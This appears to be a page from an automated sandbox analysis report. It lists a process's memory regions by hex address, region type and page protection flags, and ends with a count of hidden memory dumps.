|
unkown
|
page readonly
|
||
1C88E000
|
unkown
|
page read and write
|
||
380000
|
unkown
|
page read and write
|
||
7EFDF000
|
unkown
|
page read and write
|
||
338000
|
unkown image
|
page write copy
|
||
81B000
|
heap default
|
page read and write
|
||
A0000
|
heap default
|
page read and write
|
||
90000
|
unkown
|
page read and write
|
||
20000
|
unkown
|
page readonly
|
||
464000
|
unkown image
|
page read and write
|
||
23C000
|
unkown
|
page read and write
|
||
870000
|
unkown image
|
page readonly
|
||
3B0000
|
heap private
|
page read and write
|
||
466000
|
unkown image
|
page read and write
|
||
740000
|
unkown image
|
page execute and read and write
|
||
7FF00100000
|
unkown
|
page read and write
|
||
120000
|
heap private
|
page read and write
|
||
3508000
|
unkown
|
page read and write
|
||
46A000
|
unkown image
|
page readonly
|
||
2EDE000
|
unkown
|
page read and write
|
||
7FF001D0000
|
unkown
|
page execute and read and write
|
||
7D7000
|
heap default
|
page read and write
|
||
B30000
|
heap private
|
page read and write
|
||
2D0000
|
heap default
|
page read and write
|
||
22C0000
|
unkown
|
page read and write
|
||
2A2000
|
unkown image
|
page execute and read and write
|
||
7FF00290000
|
unkown
|
page execute and read and write
|
||
34FF000
|
unkown
|
page read and write
|
||
2364000
|
unkown
|
page read and write
|
||
210000
|
unkown
|
page read and write
|
||
7FF000F2000
|
unkown
|
page execute and read and write
|
||
4BA000
|
unkown
|
page read and write
|
||
7EFDF000
|
unkown
|
page read and write
|
||
468000
|
unkown image
|
page write copy
|
||
7FF00170000
|
unkown
|
page read and write
|
||
2A7000
|
heap default
|
page read and write
|
||
2F82000
|
unkown
|
page read and write
|
||
400000
|
unkown
|
page readonly
|
||
8D4000
|
unkown image
|
page read and write
|
||
3C0000
|
heap default
|
page read and write
|
||
2DE0000
|
heap private
|
page read and write
|
||
491000
|
heap default
|
page read and write
|
||
26E0000
|
unkown
|
page read and write
|
||
8D8000
|
unkown image
|
page write copy
|
||
235F000
|
unkown
|
page read and write
|
||
3FE000
|
heap default
|
page read and write
|
||
2410000
|
unkown
|
page readonly
|
||
640000
|
unkown
|
page readonly
|
||
2FA6000
|
unkown
|
page read and write
|
||
1B4B5000
|
unkown
|
page read and write
|
||
2F2D000
|
unkown
|
page read and write
|
||
1C46000
|
unkown
|
page read and write
|
||
400000
|
unkown
|
page readonly
|
||
1B470000
|
unkown
|
page read and write
|
||
110000
|
unkown
|
page execute and read and write
|
||
2570000
|
heap private
|
page read and write
|
||
1BC00000
|
heap private
|
page read and write
|
||
2A70000
|
heap private
|
page execute and read and write
|
||
1AC60000
|
unkown
|
page read and write
|
||
6B0000
|
unkown
|
page readonly
|
||
930000
|
unkown
|
page read and write
|
||
A87000
|
unkown
|
page readonly
|
||
450000
|
heap default
|
page read and write
|
||
311D000
|
unkown
|
page read and write
|
||
39E2000
|
unkown
|
page read and write
|
||
7FF00230000
|
unkown
|
page read and write
|
||
49D000
|
heap default
|
page read and write
|
||
2A6C000
|
unkown
|
page read and write
|
||
4C0000
|
unkown
|
page readonly
|
||
320000
|
unkown
|
page readonly
|
||
A10000
|
unkown
|
page readonly
|
||
1D67000
|
unkown
|
page readonly
|
||
90000
|
unkown
|
page read and write
|
||
99F000
|
unkown
|
page read and write
|
||
466000
|
unkown image
|
page read and write
|
||
3DE000
|
unkown
|
page read and write
|
||
7FFFFF00000
|
unkown
|
page execute and read and write
|
||
2FCF000
|
unkown
|
page read and write
|
||
610000
|
unkown
|
page readonly
|
||
1C0000
|
unkown
|
page read and write
|
||
240000
|
heap private
|
page read and write
|
||
2F3000
|
unkown image
|
page execute read
|
||
1B940000
|
unkown
|
page read and write
|
||
22C0000
|
unkown
|
page read and write
|
||
A3E000
|
unkown
|
page read and write
|
||
422000
|
unkown image
|
page execute and read and write
|
||
670000
|
unkown
|
page readonly
|
||
1D20000
|
unkown
|
page read and write
|
||
20000
|
unkown
|
page readonly
|
||
29AE000
|
stack
|
page read and write
|
||
F0000
|
unkown
|
page write copy
|
||
60000
|
unkown
|
page readonly
|
||
3544000
|
unkown
|
page read and write
|
||
340000
|
heap private
|
page read and write
|
||
28E0000
|
unkown
|
page readonly
|
||
2330000
|
unkown
|
page readonly
|
||
7FF00280000
|
unkown
|
page read and write
|
||
580000
|
unkown
|
page readonly
|
||
E60000
|
heap private
|
page read and write
|
||
2EDA000
|
unkown
|
page read and write
|
||
2380000
|
unkown
|
page read and write
|
||
D10000
|
unkown
|
page read and write
|
||
352B000
|
unkown
|
page read and write
|
||
1D8B000
|
unkown
|
page readonly
|
||
20000
|
heap private
|
page read and write
|
||
28CE000
|
unkown
|
page read and write
|
||
1D000000
|
unkown
|
page read and write
|
||
20000
|
heap private
|
page read and write
|
||
2E57000
|
unkown
|
page read and write
|
||
6D0000
|
unkown
|
page readonly
|
||
400000
|
unkown
|
page readonly
|
||
2D0E000
|
unkown
|
page read and write
|
||
27C000
|
unkown
|
page read and write
|
||
28DE000
|
unkown
|
page read and write
|
||
AC0000
|
unkown
|
page readonly
|
||
2F61000
|
unkown
|
page read and write
|
||
D00000
|
heap private
|
page read and write
|
||
4C9000
|
unkown
|
page read and write
|
||
22C0000
|
unkown
|
page read and write
|
||
2454000
|
heap private
|
page read and write
|
||
21A0000
|
unkown
|
page read and write
|
||
22EE000
|
stack
|
page read and write
|
||
13A000
|
stack
|
page read and write
|
||
2D10000
|
unkown
|
page write copy
|
||
2C32000
|
unkown
|
page read and write
|
||
2F3F000
|
unkown
|
page read and write
|
||
2E83000
|
unkown
|
page read and write
|
||
110000
|
unkown
|
page readonly
|
||
29AC000
|
unkown
|
page read and write
|
||
4B5000
|
unkown
|
page read and write
|
||
2A5F000
|
unkown
|
page read and write
|
||
2EA000
|
unkown image
|
page readonly
|
||
3A0000
|
unkown
|
page readonly
|
||
3E0000
|
unkown
|
page read and write
|
||
580000
|
unkown
|
page readonly
|
||
CE000
|
heap default
|
page read and write
|
||
22C0000
|
unkown
|
page read and write
|
||
3159000
|
unkown
|
page read and write
|
||
334000
|
unkown image
|
page read and write
|
||
4D5000
|
unkown
|
page read and write
|
||
1DEB000
|
heap private
|
page read and write
|
||
3EF000
|
unkown
|
page read and write
|
||
7FF0003A000
|
unkown
|
page execute and read and write
|
||
870000
|
unkown image
|
page readonly
|
||
100000
|
heap default
|
page read and write
|
||
353E000
|
unkown
|
page read and write
|
||
2D0000
|
unkown image
|
page readonly
|
||
2560000
|
heap private
|
page read and write
|
||
420000
|
unkown image
|
page execute and read and write
|
||
1B2D0000
|
unkown
|
page read and write
|
||
1C92D000
|
unkown
|
page read and write
|
||
2BCE000
|
unkown
|
page read and write | page guard
|
||
457000
|
heap default
|
page read and write
|
||
3355000
|
unkown
|
page read and write
|
||
370000
|
unkown
|
page readonly
|
||
285D000
|
unkown
|
page read and write
|
||
3070000
|
unkown
|
page readonly
|
||
1C9AE000
|
unkown
|
page read and write
|
||
400000
|
unkown image
|
page readonly
|
||
12C01000
|
unkown
|
page read and write
|
||
D0000
|
unkown
|
page readonly
|
||
286F000
|
unkown
|
page read and write
|
||
1B3E0000
|
unkown
|
page read and write
|
||
180000
|
unkown
|
page readonly
|
||
2F10000
|
unkown
|
page read and write
|
||
1D4F000
|
unkown
|
page read and write
|
||
150000
|
heap private
|
page read and write
|
||
22C0000
|
unkown
|
page read and write
|
||
2F2000
|
unkown image
|
page execute and read and write
|
||
90000
|
unkown
|
page read and write
|
||
3030000
|
heap private
|
page read and write
|
||
24B0000
|
unkown
|
page readonly
|
||
22C0000
|
unkown
|
page read and write
|
||
2FD2000
|
unkown
|
page read and write
|
||
2EEA000
|
unkown
|
page read and write
|
||
465000
|
unkown image
|
page write copy
|
||
2690000
|
unkown
|
page read and write
|
||
A40000
|
heap private
|
page read and write
|
||
4B8000
|
unkown
|
page read and write
|
||
22C0000
|
unkown
|
page read and write
|
||
2360000
|
unkown
|
page read and write
|
||
380000
|
unkown
|
page read and write
|
||
550000
|
unkown
|
page readonly
|
||
3502000
|
unkown
|
page read and write
|
||
1EC0000
|
unkown
|
page readonly
|
||
22C0000
|
unkown
|
page read and write
|
||
2A70000
|
unkown
|
page readonly
|
||
2E0C000
|
unkown
|
page read and write
|
||
2472000
|
heap private
|
page read and write
|
||
120000
|
heap private
|
page read and write
|
||
25B0000
|
unkown
|
page readonly
|
||
8A0000
|
unkown
|
page readonly
|
||
23C0000
|
unkown
|
page readonly
|
||
A62000
|
heap private
|
page read and write
|
||
7C4000
|
heap default
|
page read and write
|
||
E0000
|
unkown
|
page read and write
|
||
3518000
|
unkown
|
page read and write
|
||
2410000
|
unkown
|
page readonly
|
||
2F26000
|
unkown
|
page read and write
|
||
3512000
|
unkown
|
page read and write
|
||
800000
|
heap private
|
page read and write
|
||
270000
|
heap default
|
page read and write
|
||
843000
|
heap default
|
page read and write
|
||
1DA000
|
stack
|
page read and write
|
||
7FF00210000
|
unkown
|
page read and write
|
||
400000
|
unkown image
|
page readonly
|
||
A40000
|
heap private
|
page read and write
|
||
720000
|
unkown image
|
page readonly
|
||
240000
|
unkown
|
page read and write
|
||
235000
|
unkown
|
page read and write | page guard
|
||
124000
|
heap private
|
page read and write
|
||
750000
|
unkown
|
page readonly
|
||
7DD000
|
heap default
|
page read and write
|
||
3FE000
|
heap default
|
page read and write
|
||
4CA000
|
heap default
|
page read and write
|
||
142000
|
heap private
|
page read and write
|
||
100000
|
unkown
|
page read and write
|
||
1B58D000
|
unkown
|
page read and write
|
||
1F40000
|
unkown
|
page readonly
|
||
2E9D000
|
unkown
|
page read and write
|
||
7FF00042000
|
unkown
|
page execute and read and write
|
||
280000
|
unkown image
|
page readonly
|
||
1B0000
|
unkown
|
page execute and read and write
|
||
124000
|
heap private
|
page read and write
|
||
890000
|
unkown image
|
page execute and read and write
|
||
2CB000
|
unkown
|
page read and write
|
||
7FF00220000
|
unkown
|
page execute and read and write
|
||
3D4000
|
heap private
|
page read and write
|
||
AA0000
|
heap private
|
page read and write
|
||
2F7F000
|
unkown
|
page read and write
|
||
2B7E000
|
unkown
|
page read and write
|
||
2E3A000
|
unkown
|
page read and write
|
||
190000
|
unkown
|
page read and write
|
||
4CA000
|
unkown
|
page read and write
|
||
30D2000
|
unkown
|
page read and write
|
||
A30000
|
heap private
|
page read and write
|
||
2E0000
|
unkown
|
page read and write
|
||
1C10000
|
unkown
|
page read and write
|
||
AF0000
|
heap private
|
page read and write
|
||
3505000
|
unkown
|
page read and write
|
||
22C0000
|
unkown
|
page read and write
|
||
48A000
|
heap default
|
page read and write
|
||
7FF00190000
|
unkown
|
page execute and read and write
|
||
20E7000
|
unkown
|
page readonly
|
||
270000
|
unkown
|
page readonly
|
||
2BCF000
|
unkown
|
page read and write
|
||
2E60000
|
unkown
|
page write copy
|
||
3156000
|
unkown
|
page read and write
|
||
2400000
|
unkown
|
page readonly
|
||
2C36000
|
unkown
|
page read and write
|
||
22C0000
|
unkown
|
page read and write
|
||
2450000
|
heap private
|
page read and write
|
||
804000
|
heap default
|
page read and write
|
||
2884000
|
unkown
|
page read and write
|
||
277000
|
heap default
|
page read and write
|
||
2BF4000
|
heap private
|
page read and write
|
||
27CD000
|
unkown
|
page read and write
|
||
34E9000
|
unkown
|
page read and write
|
||
7A0000
|
heap default
|
page read and write
|
||
1E40000
|
unkown
|
page readonly
|
||
743000
|
unkown image
|
page execute read
|
||
10B000
|
unkown
|
page read and write
|
||
400000
|
unkown image
|
page readonly
|
||
22C0000
|
unkown
|
page read and write
|
||
C0000
|
unkown
|
page execute and read and write
|
||
9B000
|
unkown
|
page read and write
|
||
8DA000
|
unkown image
|
page readonly
|
||
90000
|
heap default
|
page read and write
|
||
340000
|
unkown
|
page write copy
|
||
307F000
|
stack
|
page read and write
|
||
7FF00200000
|
unkown
|
page read and write
|
||
29B0000
|
unkown
|
page readonly
|
||
200000
|
unkown
|
page execute and read and write
|
||
100000
|
unkown
|
page read and write
|
||
2C01000
|
unkown
|
page read and write
|
||
7FF00207000
|
unkown
|
page read and write
|
||
3D2000
|
heap private
|
page read and write
|
||
7FF002A0000
|
unkown
|
page execute and read and write
|
||
2420000
|
unkown
|
page read and write
|
||
2966000
|
unkown
|
page read and write
|
||
150000
|
heap private
|
page read and write
|
||
FC000
|
stack
|
page read and write
|
||
1DC0000
|
unkown
|
page readonly
|
||
A40000
|
unkown
|
page readonly
|
||
2FB6000
|
unkown
|
page read and write
|
||
7FF001E0000
|
unkown
|
page read and write
|
||
97000
|
heap default
|
page read and write
|
||
60000
|
unkown
|
page readonly
|
||
1B4C7000
|
unkown
|
page read and write
|
||
1B880000
|
unkown
|
page write copy
|
||
2320000
|
unkown
|
page readonly
|
||
12EB2000
|
unkown
|
page read and write
|
||
1FF0000
|
unkown
|
page readonly
|
||
2AD000
|
heap default
|
page read and write
|
||
434000
|
heap default
|
page read and write
|
||
3153000
|
unkown
|
page read and write
|
||
80000
|
unkown
|
page write copy
|
||
22C0000
|
unkown
|
page read and write
|
||
230000
|
unkown
|
page readonly
|
||
7FF00240000
|
unkown
|
page execute and read and write
|
||
2BF7000
|
heap private
|
page read and write
|
||
16C000
|
unkown
|
page read and write
|
||
27000
|
heap private
|
page read and write
|
||
487000
|
heap default
|
page read and write
|
||
E0000
|
unkown
|
page read and write
|
||
26C000
|
unkown
|
page read and write
|
||
3C0000
|
unkown
|
page readonly
|
||
ABD000
|
stack
|
page read and write
|
||
238A000
|
unkown
|
page read and write
|
||
437000
|
heap default
|
page read and write
|
||
2AB0000
|
unkown
|
page readonly
|
||
292F000
|
unkown
|
page read and write
|
||
1D10000
|
unkown
|
page readonly
|
||
530000
|
unkown
|
page readonly
|
||
468000
|
unkown image
|
page write copy
|
||
2F33000
|
unkown
|
page read and write
|
||
B0000
|
unkown
|
page readonly
|
||
7FFFFF10000
|
unkown
|
page execute and read and write
|
||
1D60000
|
unkown
|
page readonly
|
||
7FF00032000
|
unkown
|
page execute and read and write
|
||
1B4C9000
|
unkown
|
page read and write
|
||
4DB000
|
heap default
|
page read and write
|
||
20000
|
unkown
|
page readonly
|
||
22F0000
|
heap private
|
page read and write
|
||
60000
|
unkown
|
page readonly
|
||
2FB3000
|
unkown
|
page read and write
|
||
22C0000
|
unkown
|
page read and write
|
||
7FF001F0000
|
unkown
|
page execute and read and write
|
||
465000
|
unkown image
|
page write copy
|
||
294000
|
heap default
|
page read and write
|
||
2A30000
|
heap private
|
page execute and read and write
|
||
7FF0026A000
|
unkown
|
page execute and read and write
|
||
284E000
|
stack
|
page read and write
|
||
2127000
|
unkown
|
page readonly
|
||
400000
|
unkown image
|
page readonly
|
||
22C0000
|
unkown
|
page read and write
|
||
1BA80000
|
heap private
|
page read and write
|
||
4C6000
|
unkown
|
page read and write
|
||
22A0000
|
unkown
|
page readonly
|
||
317F000
|
unkown
|
page read and write
|
||
3531000
|
unkown
|
page read and write
|
||
46A000
|
unkown image
|
page readonly
|
||
D0000
|
unkown
|
page read and write
|
||
50D000
|
heap default
|
page read and write
|
||
240E000
|
unkown
|
page read and write
|
||
A44000
|
heap private
|
page read and write
|
||
2B2D000
|
unkown
|
page read and write
|
||
3541000
|
unkown
|
page read and write
|
||
5D0000
|
unkown
|
page readonly
|
||
22C0000
|
unkown
|
page read and write
|
||
270000
|
heap default
|
page read and write
|
||
2570000
|
unkown
|
page readonly
|
||
236A000
|
unkown
|
page read and write
|
||
46D000
|
heap default
|
page read and write
|
||
22E0000
|
unkown
|
page readonly
|
||
1A0000
|
unkown
|
page readonly
|
||
920000
|
heap private
|
page read and write
|
||
352E000
|
unkown
|
page read and write
|
||
7FF00180000
|
unkown
|
page execute and read and write
|
||
2F90000
|
unkown
|
page read and write
|
||
2E51000
|
unkown
|
page read and write
|
||
22F4000
|
heap private
|
page read and write
|
||
2E80000
|
unkown
|
page read and write
|
||
1F00000
|
unkown
|
page readonly
|
||
2930000
|
unkown
|
page read and write
|
||
3528000
|
unkown
|
page read and write
|
||
1FA7000
|
unkown
|
page readonly
|
||
3B4000
|
heap private
|
page read and write
|
||
3B1C000
|
unkown
|
page read and write
|
||
2FEF000
|
unkown
|
page read and write
|
||
7EFDF000
|
unkown
|
page read and write
|
||
2380000
|
heap private
|
page read and write
|
||
260000
|
heap private
|
page read and write
|
||
12C2C000
|
unkown
|
page read and write
|
||
20A7000
|
unkown
|
page readonly
|
||
12D71000
|
unkown
|
page read and write
|
||
22C0000
|
unkown
|
page read and write
|
||
1CE07000
|
unkown
|
page readonly
|
||
31D8000
|
unkown
|
page read and write
|
||
9B0000
|
heap private
|
page read and write
|
||
2F5A000
|
unkown
|
page read and write
|
||
12E50000
|
unkown
|
page read and write
|
||
4DE000
|
heap default
|
page read and write
|
||
3AC4000
|
unkown
|
page read and write
|
||
D0000
|
unkown
|
page read and write
|
||
2A3000
|
unkown image
|
page execute read
|
||
1CBA0000
|
heap private
|
page read and write
|
||
316000
|
unkown
|
page read and write
|
||
343C000
|
unkown
|
page read and write
|
||
1F0000
|
unkown
|
page execute and read and write
|
||
7EFDF000
|
unkown
|
page read and write
|
||
31BD000
|
unkown
|
page read and write
|
||
4E9000
|
heap default
|
page read and write
|
||
3D0000
|
heap private
|
page read and write
|
||
22C0000
|
unkown
|
page read and write
|
||
54D000
|
heap default
|
page read and write
|
||
A80000
|
heap private
|
page read and write
|
||
8F0000
|
unkown
|
page read and write
|
||
517000
|
heap default
|
page read and write
|
||
580000
|
unkown
|
page readonly
|
||
2F65000
|
unkown
|
page read and write
|
||
1CA7E000
|
unkown
|
page read and write
|
||
590000
|
heap default
|
page read and write
|
||
910000
|
unkown
|
page read and write
|
||
510000
|
heap default
|
page read and write
|
||
2E76000
|
unkown
|
page read and write
|
||
282000
|
unkown
|
page read and write
|
||
507000
|
heap default
|
page read and write
|
||
140000
|
unkown
|
page readonly
|
||
1DB5000
|
heap private
|
page read and write
|
||
2C20000
|
heap private
|
page read and write
|
||
100000
|
unkown
|
page readonly
|
||
351B000
|
unkown
|
page read and write
|
||
3150000
|
unkown
|
page read and write
|
||
21C000
|
unkown
|
page read and write
|
||
22C0000
|
unkown
|
page read and write
|
||
3547000
|
unkown
|
page read and write
|
||
390000
|
heap private
|
page read and write
|
||
7FF002B0000
|
unkown
|
page execute and read and write
|
||
503000
|
heap default
|
page read and write
|
||
1E0000
|
unkown
|
page read and write
|
||
3BB0000
|
unkown
|
page read and write
|
||
334B000
|
unkown
|
page read and write
|
||
120000
|
unkown
|
page readonly
|
||
1C0000
|
unkown
|
page read and write
|
||
4C2000
|
unkown
|
page read and write
|
||
2420000
|
unkown
|
page read and write
|
||
19C000
|
unkown
|
page read and write
|
||
2FB0000
|
unkown
|
page read and write
|
||
3F4000
|
heap private
|
page read and write
|
||
E0000
|
unkown
|
page read and write
|
||
870000
|
unkown image
|
page readonly
|
||
467000
|
heap default
|
page read and write
|
||
22C0000
|
unkown
|
page read and write
|
||
24AD000
|
unkown
|
page read and write
|
||
2840000
|
unkown
|
page read and write
|
||
170000
|
heap private
|
page read and write
|
||
289F000
|
stack
|
page read and write
|
||
350000
|
heap private
|
page read and write
|
||
1DB0000
|
heap private
|
page read and write
|
||
210000
|
unkown
|
page read and write
|
||
4D7000
|
heap default
|
page read and write
|
||
4F0000
|
unkown
|
page readonly
|
||
34D9000
|
unkown
|
page read and write
|
||
E5E000
|
unkown
|
page read and write
|
||
1E50000
|
unkown
|
page readonly
|
||
8EE000
|
unkown
|
page read and write
|
||
2E64000
|
unkown
|
page read and write
|
||
170000
|
unkown
|
page readonly
|
||
20000
|
unkown
|
page readonly
|
||
2F0000
|
unkown image
|
page execute and read and write
|
||
7FF00270000
|
unkown
|
page execute and read and write
|
||
20000
|
unkown
|
page readonly
|
||
27E0000
|
unkown
|
page readonly
|
||
790000
|
unkown
|
page readonly
|
||
CBE000
|
stack
|
page read and write
|
||
140000
|
unkown
|
page read and write
|
||
22C0000
|
unkown
|
page read and write
|
||
893000
|
unkown image
|
page execute read
|
||
4CF000
|
heap default
|
page read and write
|
||
20000
|
heap private
|
page read and write
|
||
2020000
|
heap private
|
page read and write
|
||
3C0000
|
unkown
|
page readonly
|
||
2F43000
|
unkown
|
page read and write
|
||
422000
|
unkown image
|
page execute and read and write
|
||
3622000
|
unkown
|
page read and write
|
||
70000
|
unkown
|
page read and write
|
||
1E90000
|
heap private
|
page execute and read and write
|
||
270000
|
heap default
|
page read and write
|
||
154000
|
heap private
|
page read and write
|
||
474000
|
heap default
|
page read and write
|
||
12D11000
|
unkown
|
page read and write
|
||
22C0000
|
unkown
|
page read and write
|
||
4D0000
|
heap default
|
page read and write
|
||
B0000
|
heap private
|
page read and write
|
||
930000
|
heap private
|
page read and write
|
||
236000
|
unkown
|
page read and write
|
||
25C000
|
stack
|
page read and write
|
||
1BB60000
|
heap private
|
page read and write
|
||
48D000
|
heap default
|
page read and write
|
||
AF8000
|
heap private
|
page read and write
|
||
22C0000
|
unkown
|
page read and write
|
||
4C6000
|
heap default
|
page read and write
|
||
100000
|
unkown
|
page readonly
|
||
7FF00132000
|
unkown
|
page execute and read and write
|
||
3C7000
|
heap default
|
page read and write
|
||
90000
|
unkown
|
page readonly
|
||
22C0000
|
unkown
|
page read and write
|
||
240000
|
unkown
|
page read and write
|
||
30B3000
|
unkown
|
page read and write
|
||
7FF0010A000
|
unkown
|
page execute and read and write
|
||
1D6C000
|
unkown
|
page readonly
|
||
4BA000
|
heap default
|
page read and write
|
||
7EFDF000
|
unkown
|
page read and write
|
||
CFE000
|
unkown
|
page read and write
|
||
21A7000
|
unkown
|
page readonly
|
||
2490000
|
unkown
|
page readonly
|
||
22C0000
|
unkown
|
page read and write
|
||
2A3A000
|
heap private
|
page execute and read and write
|
||
1CC20000
|
unkown
|
page readonly
|
||
892000
|
unkown image
|
page execute and read and write
|
||
2E86000
|
unkown
|
page read and write
|
||
2BF0000
|
heap private
|
page read and write
|
||
2A0000
|
unkown image
|
page execute and read and write
|
||
380000
|
unkown
|
page readonly
|
||
B10000
|
heap private
|
page read and write
|
||
2F00000
|
unkown
|
page read and write
|
||
2C64000
|
unkown
|
page read and write
|
||
454000
|
heap default
|
page read and write
|
||
784000
|
unkown image
|
page read and write
|
||
430000
|
heap default
|
page read and write
|
||
1E80000
|
unkown
|
page readonly
|
||
3413000
|
unkown
|
page read and write
|
||
293E000
|
unkown
|
page read and write
|
||
7FF001B0000
|
unkown
|
page execute and read and write
|
||
33A000
|
unkown image
|
page readonly
|
||
1D50000
|
unkown
|
page readonly
|
||
2F8E000
|
unkown
|
page read and write
|
||
7FF00105000
|
unkown
|
page read and write
|
||
22AE000
|
stack
|
page read and write
|
||
2FAD000
|
unkown
|
page read and write
|
||
3F0000
|
heap default
|
page read and write
|
||
35AA000
|
unkown
|
page read and write
|
||
22C0000
|
unkown
|
page read and write
|
||
1C7BE000
|
unkown
|
page read and write
|
||
788000
|
unkown image
|
page write copy
|
||
2FC5000
|
unkown
|
page read and write
|
||
3515000
|
unkown
|
page read and write
|
||
2F38000
|
unkown
|
page read and write
|
||
1FC0000
|
unkown
|
page readonly
|
||
4F4000
|
heap default
|
page read and write
|
||
2E8000
|
unkown image
|
page write copy
|
There are 613 hidden memdumps, click here to show them.